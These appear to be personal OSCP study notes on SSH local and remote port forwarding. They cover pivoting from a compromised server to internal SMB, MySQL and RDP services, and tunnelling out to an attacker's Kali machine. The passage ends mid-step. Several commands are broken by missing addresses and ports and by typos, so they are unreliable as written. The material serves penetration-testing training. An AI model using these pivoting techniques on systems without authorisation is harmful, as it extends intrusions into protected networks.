OSCP Notes

Port Forwarding

Port forward it to the 52846.
ssh [email protected] -L 4545:localhost:52846
Now visit (NEW) SO COOL!!!

Local Port Forwarding with ssh

Scenario: you've compromised a server that has ssh service enabled and saw it connected to another network which has certain services running such as SMB. We can create an ssh tunnel to send all the SMB traffic to our machine and then to the another network.
ssh -N -L [[email protected]_machine_IP]
By doing this, we can execute smb related commands to the localhost: which redirects to the target IP (remote machine that we don't have access to)!
make sure to edit /etc/samba/smb.conf if the server is new (2016) as it doesn't support SMB2.
sudo nano /etc/samba/smb.conf
cat /etc/samba/smb.conf
min protocol = SMB2
sudo /etc/init.d/smbd restart
Validate that our smb server is listening:
ss -antp | grep "445"
Running smbclient through the SSH tunnel:
smbclient -L -U Administrator

SSH remote forwarding

  • Scenario --- you compromised the machine (low-level shell) but an inbound ssh connection is filtered from outside (Kali can't access the target machine via ssh) and there's another service running as root like MySQL (3306)
  • If the outbound connection with ssh is not filtered by firewall, we can create a remote port forwarding tunnel via ssh to kali and we will be able to access mysql through kali.
From victim's low level shell, run the following
ssh -N -R kali_IP:2221: [email protected]_IP
-N - no ssh command
  • -R remote port forwarding
  • so we are creating a tunnel to kali on port 2221 which will allow inbound connection to 3306
validate you're listening on 2221:
ss -antp | grep "2221"
Then we can enum the -p 2221 on localhost, essentially enumerating the 3306 on that remote host!
nmap -sS =sV -p 2221
By using this technique, we can get a RDP connection if 3390 is open on the target machine!
#on the target
ssh [email protected]_ip -N -R kali_IP:3390:
#after the remote tunnel is open, run the following on kali